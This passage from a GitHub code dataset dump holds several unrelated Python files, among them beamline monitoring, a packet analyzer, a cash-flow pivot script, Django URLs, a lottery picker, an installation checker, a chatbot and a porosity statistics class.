epics.PV(LAM11_ERR)\nLAM11_MSG_pv = epics.PV(LAM11_MSG)\nLAM11_REF_pv = epics.PV(LAM11_REF)\nLAM11_BAD_pv = epics.PV(LAM11_BAD)\nLAM11_pv = epics.PV(LAM11)\n# Limit calcs\nwith source(channels=[BAM1]) as stream:\n while True:\n message = stream.receive()\n PulseID = message.data.pulse_id\n \n # PACM \n if PulseID%4 == 0:\n if np.logical_and(LAS_XRAY_pv.get() > LAS_XRAY_REF_pv.get()-LAS_XRAY_ERR_pv.get(),LAS_XRAY_pv.get() < LAS_XRAY_REF_pv.get()+LAS_XRAY_ERR_pv.get()):\n LAS_XRAY_MSG_pv.put(PulseID)\n if np.logical_and(LAS_EVR_pv.get() > LAS_EVR_REF_pv.get()-LAS_EVR_ERR_pv.get(),LAS_EVR_pv.get() < LAS_EVR_REF_pv.get()+LAS_EVR_ERR_pv.get()):\n LAS_EVR_MSG_pv.put(PulseID)\n if np.logical_and(XRAY_EVR_pv.get() > XRAY_EVR_REF_pv.get()-XRAY_EVR_ERR_pv.get(),XRAY_EVR_pv.get() < XRAY_EVR_REF_pv.get()+XRAY_EVR_ERR_pv.get()):\n XRAY_EVR_MSG_pv.put(PulseID)\n # PALM \n if PulseID%4 == 0:\n if np.logical_and(PALM_LIVE_pv.get() > PALM_LIVE_REF_pv.get()-PALM_LIVE_ERR_pv.get(),PALM_LIVE_pv.get() < PALM_LIVE_REF_pv.get()+PALM_LIVE_ERR_pv.get()):\n PALM_LIVE_MSG_pv.put(PulseID)\n if np.logical_and(PALM_RAVE_pv.get() > PALM_RAVE_REF_pv.get()-PALM_RAVE_ERR_pv.get(),PALM_RAVE_pv.get() < PALM_RAVE_REF_pv.get()+PALM_RAVE_ERR_pv.get()):\n PALM_RAVE_MSG_pv.put(PulseID)\n\n # BAM \n if PulseID%4 == 0:\n BAM1Val = message.data.data[BAM1].value\n BAM1Val = BAM1Val*1000\n if np.logical_and(BAM1Val > BAM1_REF_pv.get()-BAM1_ERR_pv.get(),BAM1Val < BAM1_REF_pv.get()+BAM1_ERR_pv.get()):\n BAM1_MSG_pv.put(PulseID)\n # LAM\n LAMFAC = 6666.6 \n if PulseID%4 == 0:\n if np.logical_and(LAM252_pv.get()*LAMFAC > LAM252_REF_pv.get()-LAM252_ERR_pv.get(),LAM252_pv.get()*LAMFAC < LAM252_REF_pv.get()+LAM252_ERR_pv.get()):\n LAM252_MSG_pv.put(PulseID)\n if PulseID%4 == 0:\n if np.logical_and(LAM11_pv.get()*LAMFAC > LAM11_REF_pv.get()-LAM11_ERR_pv.get(),LAM11_pv.get()*LAMFAC < LAM11_REF_pv.get()+LAM11_ERR_pv.get()):\n LAM11_MSG_pv.put(PulseID)\n # 
PPROBE \n if PulseID%4 == 0:\n if np.logical_and(PPROBE_LIVE_pv.get() > PPROBE_LIVE_REF_pv.get()-PPROBE_LIVE_ERR_pv.get(),PPROBE_LIVE_pv.get() < PPROBE_LIVE_REF_pv.get()+PPROBE_LIVE_ERR_pv.get()):\n PPROBE_LIVE_MSG_pv.put(PulseID)\n if np.logical_and(PPROBE_RAVE_pv.get() > PPROBE_RAVE_REF_pv.get()-PPROBE_RAVE_ERR_pv.get(),PPROBE_RAVE_pv.get() < PPROBE_RAVE_REF_pv.get()+PPROBE_RAVE_ERR_pv.get()):\n PPROBE_RAVE_MSG_pv.put(PulseID)\n\n","repo_name":"arrellc/PhotonDiagOnline","sub_path":"PALM/AlvraLimits.py","file_name":"AlvraLimits.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16254486186","text":"import sys\nfrom function import *\nfrom gui import *\n\ndef openFile():\n fp = \"\"\n while True:\n try:\n fp = open(openPath(), 'r')\n break\n except OSError:\n if fp == \"\": exit()\n continue\n return fp\n\n#verifier filepath\nif(len(sys.argv)==1):\n fp = openFile()\nelif(len(sys.argv)>2):\n notify(\"Error\",\"Too many arguements, please select a file instead\")\n fp = openFile()\nelse:\n try:\n fp = open(sys.argv[1], 'r')\n except FileNotFoundError:\n notify(\"Error\",\"File not found, please select another file\")\n fp = openFile()\n\nwhile True:\n numTrame = 0\n tab = [[]]\n brut = [\"\"]\n ifBreak = True\n for line in fp.read().lower().splitlines():\n tmp = line.split(' ')\n\n #verifier offset\n offset = tmp.pop(0)\n try:\n if(int(offset,16) == 0 and len(tab[numTrame])>0): \n numTrame += 1\n tab.append([])\n brut.append(\"\")\n if(int(offset,16) > len(tab[numTrame])): \n notify(\"Error\",\"Offset error, please select another file\")\n fp.close()\n fp = openFile()\n ifBreak = False\n break\n brut[numTrame] = brut[numTrame][0:len(brut[numTrame])-3*(len(tab[numTrame])-int(offset,16))]\n brut[numTrame] += \"\\n\"\n tab[numTrame] = tab[numTrame][0:int(offset,16)]\n except ValueError:\n continue\n\n #verifier format / eliminer mots invalides\n brut[numTrame] += offset + \" \"\n for oct in tmp:\n try:\n if(len(oct)==2 and int(oct,16)<=255):\n brut[numTrame] += \" \" + oct\n tab[numTrame].append(oct)\n except ValueError:\n continue\n\n if ifBreak: fp.close()\n\n tramelist = []\n titlelist = []\n output = open(\"output.txt\",\"w\")\n\n #analyse & write\n if ifBreak: \n for trame in tab:\n try:\n out,title = Ethernet(trame.copy())\n except IndexError:\n notify(\"Error\",\"Erreur trame non complete à la ligne \"+str(len(trame)//16+1)+\" octet n° \"+str(len(trame)%16+1))\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n except Exception as text:\n notify(\"Error\",repr(text))\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n \n\n tramelist.append(out)\n titlelist.append(title)\n output.write(\"##########\\n\"+str(titlelist.index(title)+1)+\" - \"+title+\"\\n##########\\n\")\n output.write(out+\"\\n\\n\")\n\n #affichage\n if ifBreak:\n try:\n show(tramelist,titlelist,brut)\n except Exception:\n notify(\"Error\",\"Error while showing, please select another file\")\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n output.close()\n \n if ifBreak: break\n\nnotify(\"Success\",\"Info saved to output.txt\")","repo_name":"MRVNY/Offline","sub_path":"offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} 
+{"seq_id":"21509654122","text":"import pandas as pd\nimport datetime\n\n#cf = pd.read_csv('PF_Pivot1.csv', delimiter=';')\n#Questa forma permette di trasformare le colonne numeriche in int con punto per decimale e senza punti per migliaia\ncf = pd.read_csv(\"PF_Pivot1.csv\", sep=';', header=0, skip_blank_lines=True, decimal=',',thousands='.')\n\nprint(cf.head(10))\n\ndef blank_cell(cf):\n '''Funzione completa per la sostituzione dei nomi nella\n colonna Fornitore dove le celle sono vuote la funzione\n riporta il nome della prima cella in alto non vuota fino a che\n trova una cella vuota '''\nfor i in range(len(cf)):\n if not pd.isna(cf.loc[i, 'Fornitore']):\n cp=cf.loc[i, 'Fornitore']\n print(cf.loc[i, 'Fornitore'])\n else:\n cf.loc[i, 'Fornitore']=cp\n #print('vuota')\n\n'''Creazione della lista di tipi di pagamento unici \nattraverso l'uso di se()\nla variabole pag contiene l'elenco unico dei tipi di pagamento'''\n\npag = set(cf.loc[0:,'Pagamento Documento'])\n\n#DOTO List\n'''\n- creazione della colonna mese di pagamento in cui si indica il mese di pagamento. \nLa colonna è popolata con una funzione che usa i valori nella colonna OrAcq - Data Effettiva Evasione e\nse guesta è vuota dalla colonna OrAcq - Data Prevista Evasione e estrare il mese usando il modulo datetime\n- una volta creata la tabella si possono creare delle funzioni di aggregazione legate al\n nome del fornitore,data pagamento e tipo di pagamento suddiviso per i mesi dell'anno e il totale\n- nelle righe i nomi dei fornitori con gli importi aggregati e sommati per mese e tipo di pagamento\n'''\n\n'''La formula per raggruppare per colonne e fare la somma dei valori: \nquesta stringa ci serve per raggruppare i fornitori per data e fare la somma dei valori indicati in sum'''\n\ncf.groupby(['Fornitore','OrAcq - Data Prevista Evasione']).sum()\n\n'''questo è il modo per scegliere la colonna da sommare, as_index=False server per riportare il nome del fornitore su tutte\nle righe'''\n\ncf.groupby(['Fornitore','OrAcq - Data Prevista Evasione'], as_index=False)['OrAcq - Importo Generale Evaso 1'].sum()\n\n'''dopo questo è possibile usare le funzione groupby per sommare gli importi '''\n\n'''le colonen da dropapre perché non mi servono\n- Articolo, OrAcq - Numero Documento, Causale Documento, \n\nil comando prr dropapre in maniera permanente in pandas è:\ndf.drop('Articolo', inplace=True, axis=1)\n\n'''\n\n#Estrazione mesi da date\ndate_effettive = cf['OrAcq - Data Effettiva Evasione'].values\ndate_previste = cf['OrAcq - Data Prevista Evasione'].values\ndef getMesiAnniFromDate(date_effettive, date_previste):\n mesi = []\n anni = []\n for i, de in enumerate(date_effettive):\n if str(de) != 'nan' and str(de) != 'Non definito':\n spl = de.split()\n mesi.append(spl[1])\n anni.append(int(spl[2]))\n else:\n dp = date_previste[i]\n if str(dp) != 'nan':\n spl = dp.split()\n mesi.append(spl[1])\n anni.append(int(spl[2]))\n else:\n mesi.append('nan')\n anni.append(-1)\n\n return mesi, anni\n \nmesi, anni = getMesiAnniFromDate(date_effettive, date_previste)\ncf['Anno'] = anni\n\n\npiv = cf.pivot_table(values='OrAcq - Importo Generale Evaso 1', index=['Fornitore','Pagamento Documento'], columns=['Mese','Anno'], aggfunc='first', fill_value=0, sort=True)\n\n#per ordinare le colonne in modo corretto\npiv = 
piv.reindex(columns=['gen','feb','mar','apr','mag','giu','lug','ago','set','ott','nov','dic','nan'], level='Mese')\n","repo_name":"exploevo/CashFlow","sub_path":"CashFlow.py","file_name":"CashFlow.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71992722221","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    (r'^$', 'django.views.generic.simple.redirect_to', {'url': 'cabinet/'}),\n    (r'^admin/', include(admin.site.urls)),\n    (r'^cabinet/', include('acm.cabinet.urls')),\n    (r'^membership/', include('acm.membership.urls')),\n)\n\n\n","repo_name":"emef/ACM","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22357692596","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\ndf = pd.read_csv('dlt.csv')\n\n\n# ![](http://img4.cache.netease.com/sports/2014/5/5/20140505211309dffc6.png)\n\n\nbonus = {\n    (0, 2): 5,\n    (2, 1): 5,\n    (1, 2): 5,\n    (3, 0): 5,\n    (2, 2): 10,\n    (3, 1): 10,\n    (4, 0): 10,\n    (3, 2): 200,\n    (4, 1): 200,\n    (4, 2): 10,\n    (5, 0): 10,\n    (5, 1): 5000000,\n    (5, 2): 10000000,\n}\n\n\n# Check the list\n\ntopic, n = 'dlt', 5\nhot_water = sorted(glob(f'gamble/{topic}/*-{topic}.csv'))[-1]\ndate = hot_water[-18:-8]\ndf_dream = pd.read_csv(hot_water)\n\nlast_shit = df.loc[df.date <= date, 'date'].max()\ndf_last = df.loc[df.date == last_shit, df_dream.columns]\nlist_last = df_last.values[0].tolist()\nprint(last_shit, list_last)\n\n\ndef getd(v):\n    return len(set(v[:n]) & set(list_last[:n])), len(set(v[n:]) & set(list_last[n:]))\n\n\ndf_dream['check'] = df_dream.apply(getd, axis=1)\ndf_dream['bonus'] = df_dream.check.apply(lambda _: bonus.get(_, 0))\nprint(df_dream)\nprint('bonus', df_dream['bonus'].sum())\n\n# Draw new indices\ntd = str(pd.Timestamp.today().date())\nnp.random.seed()\nbset = df.loc[:, 'fore1':'back2'].apply(set, axis=1)\n\nia = np.random.choice(df.index)\nidx = [ia]\nobj = bset[ia]\nfor i in range(4):\n    ib = np.random.choice(bset.apply(\n        lambda _: len(_ & obj)).nsmallest(10).index)\n    idx.append(ib)\n    obj |= bset[ib]\n\nds = df.loc[idx, ['fore1', 'fore2', 'fore3','fore4', 'fore5', 'back1', 'back2']]\nobj = set(np.reshape(ds.loc[:, 'fore1':'fore5'].values, (1, 25))[0])\nprint('red', len(obj), sorted(set(range(1, 36)) - obj))\nds.to_csv(f'gamble/dlt/{td}-dlt.csv', index=False)\nprint(ds)\n","repo_name":"muxuezi/lottery","sub_path":"dlt_dream.py","file_name":"dlt_dream.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"4681737659","text":"import subprocess\nimport re\nimport argparse\nfrom pathlib import Path\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Script to verify that installation of the project has no unexpected or \\\n                                                  missing files, and that all installed includes compile stand-alone')\n    parser.add_argument('--src-dir', required=True, help='Ramses logic source dir')\n    parser.add_argument('--install-dir', required=True, help='Directory where ramses logic was installed')\n    parser.add_argument('--ignore', required=False, action='append', nargs='*', help='Ignore file patterns from the installation folder')\n    parser.add_argument('--headless', required=False, action='store_true', help='Check 
for headless binaries (no ramses renderer)')\n args = parser.parse_args()\n\n # Expect exactly these files after installation (don't list header files here, they are cross-checked with source tree)\n expectNonheaderFiles = [\n # Ramses\n r\"^lib/libramses-shared-lib-[\\w-]+\\.so$\",\n r\"^lib/libramses-shared-lib-[\\w-]+\\.so\\.\\d+\\.\\d+$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/LICENSE\\.txt$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/CHANGELOG\\.txt$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/README\\.md$\",\n # Ramses Logic\n r\"^bin/ramses-logic-viewer-headless$\",\n r\"^lib/libramses-logic\\.so$\",\n r\"^lib/libramses-logic\\.so\\.\\d+$\",\n r\"^lib/cmake/ramses-logic-\\d+\\.\\d+/ramses-logicConfig\\.cmake$\",\n r\"^lib/cmake/ramses-logic-\\d+\\.\\d+/ramses-logicConfigVersion\\.cmake$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/CHANGELOG\\.md$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/README\\.md$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/LICENSE\\.txt$\",\n ]\n\n if args.headless:\n expectNonheaderFiles += [\n r\"^lib/cmake/ramses-shared-lib-client-only-\\d+\\.\\d+/ramses-shared-lib-client-onlyConfigVersion\\.cmake$\",\n r\"^lib/cmake/ramses-shared-lib-client-only-\\d+\\.\\d+/ramses-shared-lib-client-onlyConfig\\.cmake$\",\n ]\n else:\n expectNonheaderFiles += [\n r\"^bin/ramses-logic-viewer$\",\n r\"^bin/ramses-renderer-[\\w-]+$\",\n r\"^lib/cmake/ramses-shared-lib-\\d+\\.\\d+/ramses-shared-libConfigVersion\\.cmake$\",\n r\"^lib/cmake/ramses-shared-lib-\\d+\\.\\d+/ramses-shared-libConfig\\.cmake$\",\n ]\n\n installPath = Path(args.install_dir)\n includePath = installPath / \"include\"\n\n installedHeaders = []\n unexpectedFiles = []\n\n for path in installPath.rglob(\"*\"):\n if path.is_dir():\n continue\n\n relPathStr = str(path.relative_to(installPath))\n\n # Handle all cases, don't skip anything\n if re.match(r'^include/ramses-\\d+', relPathStr):\n # Ignore include file, it belongs to RAMSES and is checked by RAMSES already\n pass\n elif re.match(r'^include/ramses-logic/', relPathStr):\n # Ramses logic header file - add to special list to check compilation later\n installedHeaders.append(str(path.relative_to(includePath)))\n else:\n for f in expectNonheaderFiles:\n if re.match(f, relPathStr):\n expectNonheaderFiles.remove(f)\n break\n else:\n unexpectedFiles.append(relPathStr)\n\n print(\"Checking install non-header files\")\n\n if args.ignore:\n # This is required because we use the more compatible 'append' option of argparse in favor of 'extend'\n patterns = [i[0] for i in args.ignore]\n print(f\"Ignoring file patterns: {', '.join(patterns)}\")\n unexpectedFiles = [f for f in unexpectedFiles if not any([re.search(p, f) for p in patterns])]\n expectNonheaderFiles = [f for f in expectNonheaderFiles if not any([re.search(p, f) for p in patterns])]\n\n # If all \"expected\" files were found, the list should be empty now - if not, report error\n if expectNonheaderFiles:\n print(\"Couldn't find some files in the install folder:\\n \" + \"\\n \".join(expectNonheaderFiles))\n return 1\n # Found a file that's not expected in the list? 
Error!\n if unexpectedFiles:\n print(\"Found following unexpected files in the install folder:\\n \" + \"\\n \".join(unexpectedFiles))\n return 1\n\n # Extract header files from the source tree\n srcIncludeDir = Path(args.src_dir) / 'include'\n srcApiHeaders = [str(f.relative_to(srcIncludeDir)) for f in srcIncludeDir.rglob(\"*\") if f.suffix == '.h']\n\n # check which headers are unexpected and which are missing\n unexpectedHeaders = list(set(installedHeaders) - set(srcApiHeaders))\n missingHeaders = list(set(srcApiHeaders) - set(installedHeaders))\n\n if len(unexpectedHeaders) > 0:\n print('ERROR: Headers should not be installed\\n ' + '\\n '.join(unexpectedHeaders))\n return 1\n if len(missingHeaders) > 0:\n print('ERROR: Headers are missing from installation\\n ' + '\\n '.join(missingHeaders))\n return 1\n\n # check that installed headers compile standalone with \"-pedantic\"\n print(\"Checking strict header compilation\")\n numPedanticErrors = 0\n for h in installedHeaders:\n temp_file = \"/tmp/rlogic_pedantic_header.cpp\"\n with open(temp_file, \"w\") as file:\n file.writelines(f\"#include \\\"{h}\\\"\\n\\n\")\n file.writelines(\"int main() {return 0;}\")\n\n cmd = f'g++ -std=c++17 -Werror -pedantic -I\"{str(includePath)}\" \"{temp_file}\" -o /tmp/rlogic-pedantic-header.o'\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n if p.returncode != 0:\n print(f'Header check failed for: {h}')\n print(cmd)\n print(out[0])\n print(out[1])\n numPedanticErrors += 1\n\n if numPedanticErrors > 0:\n print(\"ERROR: found errors with strict compilation in installed headers\")\n return 1\n\n print(\"Done\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"bmwcarit/ramses-logic","sub_path":"ci/scripts/installation-check/check-installation.py","file_name":"check-installation.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"7586364686","text":"from abc import abstractmethod\nfrom typing import cast, Tuple\n\nfrom app.core.use_cases.base_use_case import BaseUseCase\nfrom app.features.club.domain.entities.club_entity import ClubEntity\nfrom app.features.club.domain.entities.club_query import ClubRead\nfrom app.features.club.domain.repositories.club_unit_of_work import ClubUnitOfWork\n\n\nclass DeleteClubUseCase(BaseUseCase):\n unit_of_work: ClubUnitOfWork\n\n @abstractmethod\n def __call__(self, args: Tuple[int]) -> ClubRead:\n raise NotImplementedError()\n\n\nclass DeleteClubUseCaseImpl(DeleteClubUseCase):\n\n def __init__(self, unit_of_work: ClubUnitOfWork):\n self.unit_of_work = unit_of_work\n\n def __call__(self, args: Tuple[int]) -> ClubRead:\n id_, = args\n\n existing_club = self.unit_of_work.repository.find_by_id(id_)\n\n if existing_club is None:\n raise\n\n marked_club = existing_club.mark_entity_as_deleted()\n\n try:\n deleted_club = self.unit_of_work.repository.update(marked_club)\n self.unit_of_work.commit()\n except Exception:\n self.unit_of_work.rollback()\n raise\n\n return ClubRead.from_entity(cast(ClubEntity, deleted_club))\n","repo_name":"angelwayar/boliche_bd","sub_path":"app/features/club/domain/use_cases/delete_club.py","file_name":"delete_club.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"26643040131","text":"import os\nimport pytest\nimport unittest\nday = __import__('day_' + 
__file__[-5:-3])\n\n\nclass TestDay(unittest.TestCase):\n def setUp(self):\n self.real_data = open(os.path.dirname(__file__) + \"/input.txt\").read()\n self.data = \"\"\"Blueprint 1: Each ore robot costs 4 ore. Each clay robot costs 2 ore. Each obsidian robot costs 3 ore and 14 clay. Each geode robot costs 2 ore and 7 obsidian.\nBlueprint 2: Each ore robot costs 2 ore. Each clay robot costs 3 ore. Each obsidian robot costs 3 ore and 8 clay. Each geode robot costs 3 ore and 12 obsidian.\n\"\"\"\n self.data_2 = \"\"\"Blueprint 17: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 2 ore and 7 clay. Each geode robot costs 3 ore and 8 obsidian.\nBlueprint 21: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 4 ore and 6 clay. Each geode robot costs 3 ore and 11 obsidian.\nBlueprint 27: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 3 ore and 10 clay. Each geode robot costs 3 ore and 10 obsidian.\nBlueprint 30: Each ore robot costs 4 ore. Each clay robot costs 4 ore. Each obsidian robot costs 2 ore and 11 clay. Each geode robot costs 4 ore and 8 obsidian.\n\"\"\"\n\n def test_part_1(self):\n self.assertEqual(33, day.solve1(self.data))\n\n @pytest.mark.slow\n def test_part_test_euristic(self):\n self.assertEqual(11, day.Blueprint(day.load(self.data_2)[0]).best(24))\n self.assertEqual(7, day.Blueprint(day.load(self.data_2)[1]).best(24))\n self.assertEqual(5, day.Blueprint(day.load(self.data_2)[2]).best(24))\n self.assertEqual(3, day.Blueprint(day.load(self.data_2)[3]).best(24))\n\n @pytest.mark.slow\n def test_part_2(self):\n # 56 * 62 = 3472\n self.assertEqual(56, day.Blueprint(day.load(self.data)[0]).best(32))\n self.assertEqual(62, day.Blueprint(day.load(self.data)[1]).best(32))\n\n @pytest.mark.slow\n def test_solution_part_1(self):\n self.assertEqual(1150, day.solve1(self.real_data))\n\n @pytest.mark.slow\n def test_solution_part_2(self):\n self.assertEqual(37367, day.solve2(self.real_data))\n","repo_name":"taifu/aoc","sub_path":"2022/19/test_19.py","file_name":"test_19.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"36735392891","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# audio to text\nimport speech_recognition as sr\nimport pyttsx3\n\n# text to emotion\nfrom text2emotion import get_emotion\n\n# Chatbot\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# display reply\nimport threading\n# import pyglet\n\n# user emotion\nfrom fer import FER\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n# display gif\nimport imageio\n\n# hide logging info\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\n# simple video-chat-bot\nclass VCBot():\n def __init__(self):\n # flag - false if vcbot is diplaying reply (speaking something)\n global flag\n flag = True\n self.r = sr.Recognizer()\n\n # Chatbot\n self.chatbot = ChatBot(\n 'Charlie'\n )\n\n self.trainer = ChatterBotCorpusTrainer(self.chatbot)\n\n self.trainer.train(\n *self.get_samples()\n )\n # speak\n self.engine = pyttsx3.init()\n self.engine.setProperty('rate', 145)\n logger.info(\"VCbot initialized\")\n\n def get_samples(self):\n __dir__ = os.path.dirname(os.path.realpath('__dir__'))\n sample_dir = os.path.join(__dir__, 'resources', 'samples')\n sample_list = [os.path.join(sample_dir, file)\n for file in 
os.listdir(sample_dir)]\n return sample_list\n\n def getUserEmotion(self):\n # detector for facial emotion\n detector = FER(mtcnn=True)\n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n cv2.imwrite('temp.jpeg', frame)\n img = plt.imread('temp.jpeg')\n res = detector.detect_emotions(img)\n os.remove('temp.jpeg')\n if len(res) == 0:\n logger.info(\"No face detected\")\n return 'neutral'\n res_emotion = res[0]['emotions']\n return max(res_emotion, key=res_emotion.get)\n\n def audioToText(self):\n # convert user audio to text (language = english)\n try:\n # use the microphone as source for input.\n with sr.Microphone() as source2:\n\n # wait for a second to let the recognizer\n # adjust the energy threshold based on\n # the surrounding noise level\n self.r.adjust_for_ambient_noise(source2, duration=0.2)\n\n # listens for the user's input\n audio2 = self.r.listen(source2)\n\n # Using ggogle to recognize audio\n MyText = self.r.recognize_google(audio2)\n MyText = MyText.lower()\n\n return MyText\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n logger.warning(\n \"Aud2text: Could not request results; {0}\".format(e))\n return 'error'\n\n except sr.UnknownValueError:\n print(\"unknown error occured\")\n logger.warning(\"Aud2text: unknown error occured\")\n return 'error'\n\n def getTextEmotion(self, t):\n # derive emotion from any text input\n res = get_emotion(t)\n emotion = max(res, key=res.get)\n if res[emotion] == 0:\n return 'neutral'\n return emotion.lower()\n\n def getChatReply(self, q):\n # chatterbot reply for given text input\n return str(self.chatbot.get_response(q))\n\n def vid(self, lock):\n # use gif for displaying reply to user\n gif = imageio.mimread('./resources/boy-talk.gif')\n nums = len(gif)\n imgs = [cv2.cvtColor(img, cv2.COLOR_RGB2BGR) for img in gif]\n i = 0\n global flag\n while True:\n lock.acquire()\n if flag:\n # no movement if not speaking\n cv2.imshow(\"gif\", imgs[0])\n else:\n # gif enabled for speaking\n cv2.imshow(\"gif\", imgs[i])\n lock.release()\n pressed = cv2.waitKey(25) & 0xFF\n if pressed == ord('q'):\n # quit\n logger.info(\"user requested to quit!\")\n break\n if pressed == ord('r'):\n # just to check if gif is used in dynamic sense (check by pressing 'r')\n lock.acquire()\n flag = not flag\n lock.release()\n i = (i+1) % nums\n cv2.destroyAllWindows()\n\n def SpeakText(self, command):\n # Initialize the engine to speak\n self.engine.say(command)\n self.engine.runAndWait()\n\n def ensemble(self, lock):\n # combined together: video-emotion, audio-to-text, text-emotion, emotion validation, chat-reply, speak-reply\n txt = ''\n while txt != 'exit':\n video_emotion = self.getUserEmotion()\n # print(video_emotion)\n logger.info(\"Video Emotion: \" + video_emotion)\n self.SpeakText('Your Turn')\n txt = self.audioToText()\n # print('aud2txt: ', txt)\n logger.info(\"Audio To Text: \" + txt)\n txt_emotion = self.getTextEmotion(txt)\n # print('textEmotion: ', txt_emotion)\n logger.info(\"Text Emotion: \" + txt_emotion)\n txt_inference = ''\n if txt_emotion != video_emotion and video_emotion != 'neutral':\n txt_inference = 'I am '+video_emotion\n logger.info(\"Added Text: \" + txt_inference)\n cbot_reply = self.getChatReply(txt+txt_inference)\n # print('cbot: ', cbot_reply)\n logger.info(\"Chatbot Reply: \" + cbot_reply)\n lock.acquire()\n global flag\n flag = False\n lock.release()\n self.SpeakText(cbot_reply)\n logger.info(\"Speaking something\")\n lock.acquire()\n flag = True\n lock.release()\n\n def run(self):\n # 
thread lock for critical section\n lock = threading.Lock()\n\n # creating thread\n # thread 1: display gif\n t1 = threading.Thread(target=self.vid, args=(lock,))\n # thread2: ensemble\n t2 = threading.Thread(target=self.ensemble, args=(lock,))\n\n # starting thread 1\n t1.start()\n # starting thread 2\n t2.start()\n\n # wait until thread 1 is completely executed\n t1.join()\n # wait until thread 2 is completely executed\n t2.join()\n\n # both threads completely executed\n print(\"Done!\")\n logger.info(\"Successfully completed execution, terminating vcbot!\")\n return\n\n\n# VCBot().run()\n","repo_name":"avaish1409/VideoChatBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"92"} +{"seq_id":"6236065293","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport os.path\nimport scipy.stats as ss\n\n###############################################################################\n###############################################################################\n###############################################################################\n\nclass Porosity_Distribution():\n \n \"\"\"\n Class defining porosity properties and statistics of a chosen material type\n at a specified resolution\n - mean and std of porosity measurements --> Gaussian pdf\n - probility function for connectivity given porosity value \n \"\"\"\n\n def __init__(self, \n pmean=0.3, \n pstd=0.15,\n pmin = 0,\n pmax = 1,\n **kwargs):\n\n self.pmean = pmean\n self.pstd = pstd\n self.pmin = pmin\n self.pmax = pmax\n\n self.check()\n \n def check(self):\n \n if self.pmean <= 0 or self.pmean>=1:\n raise ValueError(\n \"mean porosities smaller 0 or larger 1 are not allowed\"\n )\n if self.pmin < 0 or self.pmin > 1:\n raise ValueError(\n \"Lower and/or upper margin values in range which is not allowed\"\n )\n\n ###Convert min and max for normal distribution to min and max for standard normal distribution\n self._a = ( self.pmin - self.pmean) / self.pstd\n self._b = ( self.pmax - self.pmean) / self.pstd\n\n def update_stats(self,\n pmean=False,\n pstd=False\n ):\n if pmean:\n self.pmean = pmean\n if pstd:\n self.pstd = pstd\n self.check()\n\n def pdf_porosity(self, \n x\n ):\n \"\"\"pdf for truncated normal distribution of porosity values \"\"\"\n\n return ss.truncnorm.pdf(x , self._a, self._b,loc=self.pmean,scale = self.pstd)\n\n def rvs_porosity(self, \n size = 1\n ):\n \"\"\"random value samples from truncated normal distribution of porosity values \"\"\"\n\n return ss.truncnorm.rvs(self._a, self._b,loc=self.pmean,scale = self.pstd, size=size)\n\n def pdf_stats(self,\n x = False,\n ):\n\n if x is False: \n term0 = (ss.norm.pdf(self._b) - ss.norm.pdf(self._a))/(ss.norm.cdf(self._b) - ss.norm.cdf(self._a))\n term1 = (self._b*ss.norm.pdf(self._b) - self._a*ss.norm.pdf(self._a))/(ss.norm.cdf(self._b) - ss.norm.cdf(self._a)) \n\n pmean_trunc = self.pmean - self.pstd * term0 \n pvar_trunc = self.pstd**2 * (1 - term1 - term0**2)\n \n elif x is not False:\n pdf = self.pdf_porosity(x)\n pmean_trunc = np.trapz(x*pdf,x=x)\n pvar_trunc = np.trapz((x-pmean_trunc)**2*pdf,x=x)\n\n 